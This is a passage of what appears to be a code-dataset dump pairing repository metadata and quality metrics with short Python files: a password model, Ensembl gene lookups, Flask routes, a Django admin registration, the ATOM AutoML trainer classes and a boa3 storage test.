| 19.375
| 0.746154
| 0.419355
| 0
| 0
| 0
| 0
| 0.095238
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 0.333333
| 0
| 0.333333
| 0
| 1
| 0
| 0
| null | 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 0
| 0
|
0
| 5
|
07e9100b76fba4e9dad294c4b62ed6526c662f46
| 212
|
py
|
Python
|
nautilus/auth/models/userPassword.py
|
AlecAivazis/python
|
70e2acef27a2f87355590be1a6ca60ce3ab4d09c
|
[
"MIT"
] | 9
|
2019-02-17T01:33:43.000Z
|
2022-02-03T02:14:12.000Z
|
nautilus/auth/models/userPassword.py
|
AlecAivazis/python
|
70e2acef27a2f87355590be1a6ca60ce3ab4d09c
|
[
"MIT"
] | 59
|
2016-03-14T15:55:50.000Z
|
2016-07-17T15:22:56.000Z
|
nautilus/auth/models/userPassword.py
|
AlecAivazis/python
|
70e2acef27a2f87355590be1a6ca60ce3ab4d09c
|
[
"MIT"
] | 3
|
2017-08-03T20:18:59.000Z
|
2018-07-18T02:03:41.000Z
|
# local imports
from nautilus.models import fields, BaseModel
from .mixins import HasPassword
class UserPassword(HasPassword, BaseModel):
user = fields.CharField(unique=True) # points to a remote user entry
| 30.285714
| 72
| 0.792453
| 27
| 212
| 6.222222
| 0.777778
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.141509
| 212
| 6
| 73
| 35.333333
| 0.923077
| 0.20283
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| false
| 0.5
| 0.5
| 0
| 1
| 0
| 1
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 1
| 0
| 1
| 0
|
0
| 5
|
ed029aa0f8161b3133da50fd8faed0e794092442
| 792
|
py
|
Python
|
src/dohlee/hg38.py
|
dohlee/python-dohlee
|
55e77591fe1e604c602bd8ab2bfaa8bd0277af54
|
[
"MIT"
] | 1
|
2020-02-12T18:45:41.000Z
|
2020-02-12T18:45:41.000Z
|
src/dohlee/hg38.py
|
dohlee/python-dohlee
|
55e77591fe1e604c602bd8ab2bfaa8bd0277af54
|
[
"MIT"
] | null | null | null |
src/dohlee/hg38.py
|
dohlee/python-dohlee
|
55e77591fe1e604c602bd8ab2bfaa8bd0277af54
|
[
"MIT"
] | null | null | null |
from pyensembl import EnsemblRelease
ENSEMBL_RELEASE_VERSION = 87
def gene_by_id(*args, **kwargs):
genome = EnsemblRelease(ENSEMBL_RELEASE_VERSION)
return genome.gene_by_id(*args, **kwargs)
def genes_by_name(*args, **kwargs):
genome = EnsemblRelease(ENSEMBL_RELEASE_VERSION)
return genome.genes_by_name(*args, **kwargs)
def genes_at_locus(*args, **kwargs):
genome = EnsemblRelease(ENSEMBL_RELEASE_VERSION)
return genome.genes_at_locus(*args, **kwargs)
def gene_names_at_locus(*args, **kwargs):
genome = EnsemblRelease(ENSEMBL_RELEASE_VERSION)
return genome.gene_names_at_locus(*args, **kwargs)
def symbol2ensg(*args):
genome = EnsemblRelease(ENSEMBL_RELEASE_VERSION)
return genome.gene_ids_of_gene_name(*args)[0]
| 27.310345
| 55
| 0.733586
| 99
| 792
| 5.525253
| 0.252525
| 0.146252
| 0.30713
| 0.383912
| 0.820841
| 0.680073
| 0.6234
| 0.6234
| 0.519196
| 0.519196
| 0
| 0.006033
| 0.162879
| 792
| 28
| 56
| 28.285714
| 0.819005
| 0
| 0
| 0.294118
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.294118
| false
| 0
| 0.058824
| 0
| 0.647059
| 0
| 0
| 0
| 0
| null | 0
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 1
| 0
|
0
| 5
|
ed1ea9baa7012dfe7cb4c78bace20352bff8d2f3
| 622
|
py
|
Python
|
app/routes.py
|
jsford/cameracalibrator
|
a260a3af4c459208de8c2eaca4dc02c90938fc0e
|
[
"MIT"
] | null | null | null |
app/routes.py
|
jsford/cameracalibrator
|
a260a3af4c459208de8c2eaca4dc02c90938fc0e
|
[
"MIT"
] | null | null | null |
app/routes.py
|
jsford/cameracalibrator
|
a260a3af4c459208de8c2eaca4dc02c90938fc0e
|
[
"MIT"
] | null | null | null |
from app import app
from flask import render_template, flash, redirect, url_for, request, send_from_directory, jsonify
import os
@app.route('/')
@app.route('/index')
def index():
return render_template('index.html')
@app.route('/stereo')
def stereo():
return render_template('stereo.html')
@app.route('/patterns')
def patterns():
return render_template('patterns.html', title='Pattern Generator')
@app.route('/about')
def about():
return render_template('about.html')
@app.route('/favicon')
def favicon():
return send_from_directory(os.path.join(app.root_path, 'static', 'images'), 'favicon.ico')
| 24.88
| 98
| 0.717042
| 84
| 622
| 5.178571
| 0.392857
| 0.110345
| 0.183908
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.115756
| 622
| 24
| 99
| 25.916667
| 0.790909
| 0
| 0
| 0
| 0
| 0
| 0.194534
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.263158
| true
| 0
| 0.157895
| 0.263158
| 0.684211
| 0
| 0
| 0
| 0
| null | 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 1
| 1
| 0
| 0
| 1
| 1
| 0
|
0
| 5
|
ed34e7be86a6c5e8bc6c7592e059017b2c8ccbe0
| 40
|
py
|
Python
|
complex/complex/errors.py
|
hazmat345/example-plugins
|
68551c5327bdbb45870a2a5c121ee99d2673682b
|
[
"MIT"
] | null | null | null |
complex/complex/errors.py
|
hazmat345/example-plugins
|
68551c5327bdbb45870a2a5c121ee99d2673682b
|
[
"MIT"
] | 4
|
2018-08-17T21:10:07.000Z
|
2022-02-08T17:47:30.000Z
|
complex/complex/errors.py
|
hazmat345/example-plugins
|
68551c5327bdbb45870a2a5c121ee99d2673682b
|
[
"MIT"
] | 3
|
2021-03-23T14:18:54.000Z
|
2021-12-15T17:08:48.000Z
|
class StartupError(Exception):
pass
| 13.333333
| 30
| 0.75
| 4
| 40
| 7.5
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.175
| 40
| 2
| 31
| 20
| 0.909091
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0.5
| 0
| 0
| 0.5
| 0
| 1
| 1
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 1
| 0
| 0
| 0
| 0
|
0
| 5
|
ed58368f0714e5283ef2b5392bd9fc869f1b918a
| 166
|
py
|
Python
|
projects/admin.py
|
Michellemukami/portfolio1
|
8c661112a43664e0b8f3b89d08b5052523c5e4c3
|
[
"MIT"
] | null | null | null |
projects/admin.py
|
Michellemukami/portfolio1
|
8c661112a43664e0b8f3b89d08b5052523c5e4c3
|
[
"MIT"
] | 5
|
2020-06-05T22:54:41.000Z
|
2021-09-08T01:17:21.000Z
|
projects/admin.py
|
Michellemukami/portfolio1
|
8c661112a43664e0b8f3b89d08b5052523c5e4c3
|
[
"MIT"
] | null | null | null |
from django.contrib import admin
from .models import Project
# Register your models here.
class ProjectAdmin(admin.ModelAdmin):
admin.site.register(Project)
| 20.75
| 37
| 0.777108
| 21
| 166
| 6.142857
| 0.666667
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.150602
| 166
| 8
| 38
| 20.75
| 0.914894
| 0.156627
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 0.5
| 0
| 0.75
| 0
| 1
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 5
|
ed81e0aae0e176fccaee25b1bcf42ad01708682e
| 17,556
|
py
|
Python
|
atom/training.py
|
tvdboom/AutoML
|
ee8432577520cb3f54578e8ef1e8496f95cffc03
|
[
"MIT"
] | null | null | null |
atom/training.py
|
tvdboom/AutoML
|
ee8432577520cb3f54578e8ef1e8496f95cffc03
|
[
"MIT"
] | null | null | null |
atom/training.py
|
tvdboom/AutoML
|
ee8432577520cb3f54578e8ef1e8496f95cffc03
|
[
"MIT"
] | null | null | null |
# -*- coding: utf-8 -*-
"""
Automated Tool for Optimized Modelling (ATOM)
Author: Mavs
Description: Module containing the training classes.
"""
from copy import copy
from typing import Optional, Union
import numpy as np
import pandas as pd
from sklearn.base import BaseEstimator
from typeguard import typechecked
from atom.basetrainer import BaseTrainer
from atom.plots import BaseModelPlotter
from atom.utils import (
INT, SEQUENCE_TYPES, CustomDict, composed, crash, get_best_score,
infer_task, lst, method_to_log,
)
class Direct(BaseEstimator, BaseTrainer, BaseModelPlotter):
"""Direct training approach.
Fit and evaluate over the models. Contrary to SuccessiveHalving
and TrainSizing, the direct approach only iterates once over the
models, using the full dataset.
See basetrainer.py for a description of the parameters.
"""
def __init__(
self, models, metric, greater_is_better, needs_proba, needs_threshold,
n_calls, n_initial_points, est_params, bo_params, n_bootstrap, n_jobs,
verbose, warnings, logger, experiment, gpu, random_state,
):
super().__init__(
models, metric, greater_is_better, needs_proba, needs_threshold,
n_calls, n_initial_points, est_params, bo_params, n_bootstrap,
n_jobs, verbose, warnings, logger, experiment, gpu, random_state,
)
@composed(crash, method_to_log)
def run(self, *arrays):
"""Run the trainer.
Parameters
----------
*arrays: sequence of indexables
Training set and test set. Allowed formats are:
- train, test
- X_train, X_test, y_train, y_test
- (X_train, y_train), (X_test, y_test)
"""
self.branch._data, self.branch._idx, self.holdout = self._get_data(arrays)
self.task = infer_task(self.y_train, goal=self.goal)
self._prepare_parameters()
self._core_iteration()
class SuccessiveHalving(BaseEstimator, BaseTrainer, BaseModelPlotter):
"""Successive halving training approach.
The successive halving technique is a bandit-based algorithm that
fits N models to 1/N of the data. The best half are selected to
go to the next iteration where the process is repeated. This
continues until only one model remains, which is fitted on the
complete dataset. Beware that a model's performance can depend
greatly on the amount of data on which it is trained. For this
reason, it is recommended to only use this technique with similar
models, e.g. only using tree-based models.
See basetrainer.py for a description of the remaining parameters.
Parameters
----------
skip_runs: int, optional (default=0)
Skip last `skip_runs` runs of the successive halving.
"""
def __init__(
self, models, metric, greater_is_better, needs_proba, needs_threshold,
skip_runs, n_calls, n_initial_points, est_params, bo_params, n_bootstrap,
n_jobs, verbose, warnings, logger, experiment, gpu, random_state,
):
self.skip_runs = skip_runs
super().__init__(
models, metric, greater_is_better, needs_proba, needs_threshold,
n_calls, n_initial_points, est_params, bo_params, n_bootstrap,
n_jobs, verbose, warnings, logger, experiment, gpu, random_state,
)
@composed(crash, method_to_log)
def run(self, *arrays):
"""Run the trainer.
Parameters
----------
*arrays: sequence of indexables
Training set and test set. Allowed formats are:
- train, test
- X_train, X_test, y_train, y_test
- (X_train, y_train), (X_test, y_test)
"""
self.branch._data, self.branch._idx, self.holdout = self._get_data(arrays)
self.task = infer_task(self.y_train, goal=self.goal)
self._prepare_parameters()
if self.skip_runs < 0:
raise ValueError(
"Invalid value for the skip_runs parameter."
f"Value should be >=0, got {self.skip_runs}."
)
elif self.skip_runs >= len(self._models) // 2 + 1:
raise ValueError(
"Invalid value for the skip_runs parameter. Less than "
f"1 run remaining, got n_runs={len(self._models) // 2 + 1} "
f"and skip_runs={self.skip_runs}."
)
run = 0
models = CustomDict()
og_models = {k: copy(v) for k, v in self._models.items()}
while len(self._models) > 2 ** self.skip_runs - 1:
# Create the new set of models for the run
for m in self._models.values():
m.name += str(len(self._models))
m._pred = [None] * 15 # Avoid shallow copy
m._train_idx = len(self.train) // len(self._models)
# Print stats for this subset of the data
p = round(100.0 / len(self._models))
self.log(f"\n\nRun: {run} {'='*32} >>", 1)
self.log(f"Models: {', '.join(lst(self.models))}", 1)
self.log(f"Size of training set: {len(self.train)} ({p}%)", 1)
self.log(f"Size of test set: {len(self.test)}", 1)
self._core_iteration()
models.update({m.name: m for m in self._models.values()})
# Select next models for halving
best = pd.Series(
data=[get_best_score(m) for m in self._models.values()],
index=[m.name for m in self._models.values()],
).nlargest(n=len(self._models) // 2, keep="first")
names = [m.acronym for m in self._models.values() if m.name in best.index]
self._models = CustomDict(
{k: copy(v) for k, v in og_models.items() if v.acronym in names}
)
run += 1
self._models = models # Restore all models
class TrainSizing(BaseEstimator, BaseTrainer, BaseModelPlotter):
"""Train Sizing training approach.
When training models, there is usually a trade-off between model
performance and computation time, that is regulated by the number
of samples in the training set. This class can be used to create
insights in this trade-off, and help determine the optimal size of
the training set. The models are fitted multiple times,
ever-increasing the number of samples in the training set.
See basetrainer.py for a description of the remaining parameters.
Parameters
----------
train_sizes: int or sequence, optional (default=5)
Sequence of training set sizes used to run the trainings.
- If int: Number of equally distributed splits, i.e. for a
value N it's equal to np.linspace(1.0/N, 1.0, N).
- If sequence: Fraction of the training set when <=1, else
total number of samples.
"""
def __init__(
self, models, metric, greater_is_better, needs_proba, needs_threshold,
train_sizes, n_calls, n_initial_points, est_params, bo_params, n_bootstrap,
n_jobs, verbose, warnings, logger, experiment, gpu, random_state
):
self.train_sizes = train_sizes
super().__init__(
models, metric, greater_is_better, needs_proba, needs_threshold,
n_calls, n_initial_points, est_params, bo_params, n_bootstrap,
n_jobs, verbose, warnings, logger, experiment, gpu, random_state,
)
@composed(crash, method_to_log)
def run(self, *arrays):
"""Run the trainer.
Parameters
----------
*arrays: sequence of indexables
Training set and test set. Allowed formats are:
- train, test
- X_train, X_test, y_train, y_test
- (X_train, y_train), (X_test, y_test)
"""
self.branch._data, self.branch._idx, self.holdout = self._get_data(arrays)
self.task = infer_task(self.y_train, goal=self.goal)
self._prepare_parameters()
# Convert integer train_sizes to sequence
if isinstance(self.train_sizes, int):
self.train_sizes = np.linspace(1 / self.train_sizes, 1.0, self.train_sizes)
models = CustomDict()
og_models = {k: copy(v) for k, v in self._models.items()}
for run, size in enumerate(self.train_sizes):
# Select fraction of data to use in this run
if size <= 1:
frac = round(size, 2)
train_idx = int(size * len(self.branch.train))
else:
frac = round(size / len(self.branch.train), 2)
train_idx = size
for m in self._models.values():
m.name += str(frac).replace(".", "") # Add frac to the name
m._pred = [None] * 15 # Avoid shallow copy
m._train_idx = train_idx
# Print stats for this subset of the data
p = round(train_idx * 100.0 / len(self.branch.train))
self.log(f"\n\nRun: {run} {'='*32} >>", 1)
self.log(f"Size of training set: {train_idx} ({p}%)", 1)
self.log(f"Size of test set: {len(self.test)}", 1)
self._core_iteration()
models.update({m.name.lower(): m for m in self._models.values()})
# Create next models for sizing
self._models = CustomDict({k: copy(v) for k, v in og_models.items()})
self._models = models # Restore original models
class DirectClassifier(Direct):
"""Direct trainer for classification tasks."""
@typechecked
def __init__(
self,
models: Optional[Union[str, callable, SEQUENCE_TYPES]] = None,
metric: Optional[Union[str, callable, SEQUENCE_TYPES]] = None,
greater_is_better: Union[bool, SEQUENCE_TYPES] = True,
needs_proba: Union[bool, SEQUENCE_TYPES] = False,
needs_threshold: Union[bool, SEQUENCE_TYPES] = False,
n_calls: Union[INT, SEQUENCE_TYPES] = 0,
n_initial_points: Union[INT, SEQUENCE_TYPES] = 5,
est_params: Optional[dict] = None,
bo_params: Optional[dict] = None,
n_bootstrap: Union[INT, SEQUENCE_TYPES] = 0,
n_jobs: INT = 1,
verbose: INT = 0,
warnings: Union[bool, str] = True,
logger: Optional[Union[str, callable]] = None,
experiment: Optional[str] = None,
gpu: Union[bool, str] = False,
random_state: Optional[INT] = None,
):
self.goal = "class"
super().__init__(
models, metric, greater_is_better, needs_proba, needs_threshold,
n_calls, n_initial_points, est_params, bo_params, n_bootstrap,
n_jobs, verbose, warnings, logger, experiment, gpu, random_state,
)
class DirectRegressor(Direct):
"""Direct trainer for regression tasks."""
@typechecked
def __init__(
self,
models: Optional[Union[str, callable, SEQUENCE_TYPES]] = None,
metric: Optional[Union[str, callable, SEQUENCE_TYPES]] = None,
greater_is_better: Union[bool, SEQUENCE_TYPES] = True,
needs_proba: Union[bool, SEQUENCE_TYPES] = False,
needs_threshold: Union[bool, SEQUENCE_TYPES] = False,
n_calls: Union[INT, SEQUENCE_TYPES] = 0,
n_initial_points: Union[INT, SEQUENCE_TYPES] = 5,
est_params: Optional[dict] = None,
bo_params: Optional[dict] = None,
n_bootstrap: Union[INT, SEQUENCE_TYPES] = 0,
n_jobs: INT = 1,
verbose: INT = 0,
warnings: Union[bool, str] = True,
logger: Optional[Union[str, callable]] = None,
experiment: Optional[str] = None,
gpu: Union[bool, str] = False,
random_state: Optional[INT] = None,
):
self.goal = "reg"
super().__init__(
models, metric, greater_is_better, needs_proba, needs_threshold,
n_calls, n_initial_points, est_params, bo_params, n_bootstrap,
n_jobs, verbose, warnings, logger, experiment, gpu, random_state,
)
class SuccessiveHalvingClassifier(SuccessiveHalving):
"""SuccessiveHalving trainer for classification tasks."""
@typechecked
def __init__(
self,
models: Optional[Union[str, callable, SEQUENCE_TYPES]] = None,
metric: Optional[Union[str, callable, SEQUENCE_TYPES]] = None,
greater_is_better: Union[bool, SEQUENCE_TYPES] = True,
needs_proba: Union[bool, SEQUENCE_TYPES] = False,
needs_threshold: Union[bool, SEQUENCE_TYPES] = False,
skip_runs: INT = 0,
n_calls: Union[INT, SEQUENCE_TYPES] = 0,
n_initial_points: Union[INT, SEQUENCE_TYPES] = 5,
est_params: Optional[dict] = None,
bo_params: Optional[dict] = None,
n_bootstrap: Union[INT, SEQUENCE_TYPES] = 0,
n_jobs: INT = 1,
verbose: INT = 0,
warnings: Union[bool, str] = True,
logger: Optional[Union[str, callable]] = None,
experiment: Optional[str] = None,
gpu: Union[bool, str] = False,
random_state: Optional[INT] = None,
):
self.goal = "class"
super().__init__(
models, metric, greater_is_better, needs_proba, needs_threshold,
skip_runs, n_calls, n_initial_points, est_params, bo_params,
n_bootstrap, n_jobs, verbose, warnings, logger, experiment, gpu,
random_state,
)
class SuccessiveHalvingRegressor(SuccessiveHalving):
"""SuccessiveHalving trainer for regression tasks."""
@typechecked
def __init__(
self,
models: Optional[Union[str, callable, SEQUENCE_TYPES]] = None,
metric: Optional[Union[str, callable, SEQUENCE_TYPES]] = None,
greater_is_better: Union[bool, SEQUENCE_TYPES] = True,
needs_proba: Union[bool, SEQUENCE_TYPES] = False,
needs_threshold: Union[bool, SEQUENCE_TYPES] = False,
skip_runs: INT = 0,
n_calls: Union[INT, SEQUENCE_TYPES] = 0,
n_initial_points: Union[INT, SEQUENCE_TYPES] = 5,
est_params: Optional[dict] = None,
bo_params: Optional[dict] = None,
n_bootstrap: Union[INT, SEQUENCE_TYPES] = 0,
n_jobs: INT = 1,
verbose: INT = 0,
warnings: Union[bool, str] = True,
logger: Optional[Union[str, callable]] = None,
experiment: Optional[str] = None,
gpu: Union[bool, str] = False,
random_state: Optional[INT] = None,
):
self.goal = "reg"
super().__init__(
models, metric, greater_is_better, needs_proba, needs_threshold,
skip_runs, n_calls, n_initial_points, est_params, bo_params,
n_bootstrap, n_jobs, verbose, warnings, logger, experiment, gpu,
random_state,
)
class TrainSizingClassifier(TrainSizing):
"""TrainSizing trainer for classification tasks."""
@typechecked
def __init__(
self,
models: Optional[Union[str, callable, SEQUENCE_TYPES]] = None,
metric: Optional[Union[str, callable, SEQUENCE_TYPES]] = None,
greater_is_better: Union[bool, SEQUENCE_TYPES] = True,
needs_proba: Union[bool, SEQUENCE_TYPES] = False,
needs_threshold: Union[bool, SEQUENCE_TYPES] = False,
train_sizes: Union[INT, SEQUENCE_TYPES] = 5,
n_calls: Union[INT, SEQUENCE_TYPES] = 0,
n_initial_points: Union[INT, SEQUENCE_TYPES] = 5,
est_params: Optional[dict] = None,
bo_params: Optional[dict] = None,
n_bootstrap: Union[INT, SEQUENCE_TYPES] = 0,
n_jobs: INT = 1,
verbose: INT = 0,
warnings: Union[bool, str] = True,
logger: Optional[Union[str, callable]] = None,
experiment: Optional[str] = None,
gpu: Union[bool, str] = False,
random_state: Optional[INT] = None,
):
self.goal = "class"
super().__init__(
models, metric, greater_is_better, needs_proba, needs_threshold,
train_sizes, n_calls, n_initial_points, est_params, bo_params,
n_bootstrap, n_jobs, verbose, warnings, logger, experiment, gpu,
random_state,
)
class TrainSizingRegressor(TrainSizing):
"""TrainSizing trainer for regression tasks."""
@typechecked
def __init__(
self,
models: Optional[Union[str, callable, SEQUENCE_TYPES]] = None,
metric: Optional[Union[str, callable, SEQUENCE_TYPES]] = None,
greater_is_better: Union[bool, SEQUENCE_TYPES] = True,
needs_proba: Union[bool, SEQUENCE_TYPES] = False,
needs_threshold: Union[bool, SEQUENCE_TYPES] = False,
train_sizes: Union[INT, SEQUENCE_TYPES] = 5,
n_calls: Union[INT, SEQUENCE_TYPES] = 0,
n_initial_points: Union[INT, SEQUENCE_TYPES] = 5,
est_params: Optional[dict] = None,
bo_params: Optional[dict] = None,
n_bootstrap: Union[INT, SEQUENCE_TYPES] = 0,
n_jobs: INT = 1,
verbose: INT = 0,
warnings: Union[bool, str] = True,
logger: Optional[Union[str, callable]] = None,
experiment: Optional[str] = None,
gpu: Union[bool, str] = False,
random_state: Optional[INT] = None,
):
self.goal = "reg"
super().__init__(
models, metric, greater_is_better, needs_proba, needs_threshold,
train_sizes, n_calls, n_initial_points, est_params, bo_params,
n_bootstrap, n_jobs, verbose, warnings, logger, experiment, gpu,
random_state,
)
| 39.013333
| 87
| 0.619332
| 2,176
| 17,556
| 4.779412
| 0.129596
| 0.06375
| 0.032308
| 0.040385
| 0.723654
| 0.719423
| 0.711538
| 0.704904
| 0.690769
| 0.675385
| 0
| 0.006626
| 0.277854
| 17,556
| 449
| 88
| 39.100223
| 0.813693
| 0.187799
| 0
| 0.738255
| 0
| 0
| 0.035998
| 0.005566
| 0
| 0
| 0
| 0
| 0
| 1
| 0.040268
| false
| 0
| 0.030201
| 0
| 0.100671
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 1
| 1
| 1
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 5
|
9c1cba9c84ef96879bfa2ce2d9a510d55f04873d
| 98
|
py
|
Python
|
boa3_test/test_sc/interop_test/storage/StorageGetBytesKey.py
|
hal0x2328/neo3-boa
|
6825a3533384cb01660773050719402a9703065b
|
[
"Apache-2.0"
] | 25
|
2020-07-22T19:37:43.000Z
|
2022-03-08T03:23:55.000Z
|
boa3_test/test_sc/interop_test/storage/StorageGetBytesKey.py
|
hal0x2328/neo3-boa
|
6825a3533384cb01660773050719402a9703065b
|
[
"Apache-2.0"
] | 419
|
2020-04-23T17:48:14.000Z
|
2022-03-31T13:17:45.000Z
|
boa3_test/test_sc/interop_test/storage/StorageGetBytesKey.py
|
hal0x2328/neo3-boa
|
6825a3533384cb01660773050719402a9703065b
|
[
"Apache-2.0"
] | 15
|
2020-05-21T21:54:24.000Z
|
2021-11-18T06:17:24.000Z
|
from boa3.builtin.interop.storage import get
def Main(key: bytes) -> bytes:
return get(key)
| 16.333333
| 44
| 0.714286
| 15
| 98
| 4.666667
| 0.8
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.012346
| 0.173469
| 98
| 5
| 45
| 19.6
| 0.851852
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.333333
| false
| 0
| 0.333333
| 0.333333
| 1
| 0
| 1
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 1
| 1
| 0
| 0
|
0
| 5
|
9c30cb1be89521a8ccf2a1a3705163bf15ec3b26
| 20
|
py
|
Python
|
Calculator /app/ext.py
|
18853477039/social
|
368b5b492a0fe6c64925a79d3eaf2aa307b2b9b3
|
[
"Apache-2.0"
] | null | null | null |
Calculator /app/ext.py
|
18853477039/social
|
368b5b492a0fe6c64925a79d3eaf2aa307b2b9b3
|
[
"Apache-2.0"
] | null | null | null |
Calculator /app/ext.py
|
18853477039/social
|
368b5b492a0fe6c64925a79d3eaf2aa307b2b9b3
|
[
"Apache-2.0"
] | null | null | null |
# 初始化项目中使用的flask扩展
| 6.666667
| 18
| 0.8
| 1
| 20
| 16
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.15
| 20
| 2
| 19
| 10
| 0.941176
| 0.8
| 0
| null | 0
| null | 0
| 0
| null | 0
| 0
| 0
| null | 1
| null | true
| 0
| 0
| null | null | null | 1
| 1
| 1
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
|
0
| 5
|
9c3aeb014ac12b06e4afb3fcbc4a86c80feb4960
| 139
|
py
|
Python
|
codes_/0069_Sqrtx.py
|
SaitoTsutomu/leetcode
|
4656d66ab721a5c7bc59890db9a2331c6823b2bf
|
[
"MIT"
] | null | null | null |
codes_/0069_Sqrtx.py
|
SaitoTsutomu/leetcode
|
4656d66ab721a5c7bc59890db9a2331c6823b2bf
|
[
"MIT"
] | null | null | null |
codes_/0069_Sqrtx.py
|
SaitoTsutomu/leetcode
|
4656d66ab721a5c7bc59890db9a2331c6823b2bf
|
[
"MIT"
] | null | null | null |
# %% [69. Sqrt(x)](https://leetcode.com/problems/sqrtx/)
class Solution:
def mySqrt(self, x: int) -> int:
return int(x ** 0.5)
| 27.8
| 56
| 0.582734
| 21
| 139
| 3.857143
| 0.809524
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.036036
| 0.201439
| 139
| 4
| 57
| 34.75
| 0.693694
| 0.388489
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.333333
| false
| 0
| 0
| 0.333333
| 1
| 0
| 1
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 1
| 1
| 0
|
0
| 5
|
9c43e16a892ffd747d249faa2779c1e9708fc405
| 164
|
py
|
Python
|
src/account/admin.py
|
rahulroshan96/CloudVisual
|
aa33709d88442bcdbe3229234b4eb4f9abb4481e
|
[
"MIT",
"Unlicense"
] | 2
|
2019-03-17T18:04:32.000Z
|
2019-03-20T11:05:57.000Z
|
src/account/admin.py
|
rahulroshan96/CloudVisual
|
aa33709d88442bcdbe3229234b4eb4f9abb4481e
|
[
"MIT",
"Unlicense"
] | 4
|
2020-06-05T19:43:52.000Z
|
2021-06-01T23:15:44.000Z
|
src/account/admin.py
|
rahulroshan96/CloudVisual
|
aa33709d88442bcdbe3229234b4eb4f9abb4481e
|
[
"MIT",
"Unlicense"
] | null | null | null |
# -*- coding: utf-8 -*-
from __future__ import unicode_literals
from django.contrib import admin
from .models import Credentials
admin.site.register(Credentials)
| 20.5
| 39
| 0.786585
| 21
| 164
| 5.904762
| 0.714286
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.006944
| 0.121951
| 164
| 7
| 40
| 23.428571
| 0.854167
| 0.128049
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 0.75
| 0
| 0.75
| 0
| 1
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 5
|
92c00de14450eb5be4e038d9bc96d5a7a153f392
| 199
|
py
|
Python
|
bindings/pydeck-carto/pydeck_carto/__init__.py
|
ehtick/deck.gl
|
ac59a28a6ff03000072f11c9a5520eb87f11944c
|
[
"MIT"
] | null | null | null |
bindings/pydeck-carto/pydeck_carto/__init__.py
|
ehtick/deck.gl
|
ac59a28a6ff03000072f11c9a5520eb87f11944c
|
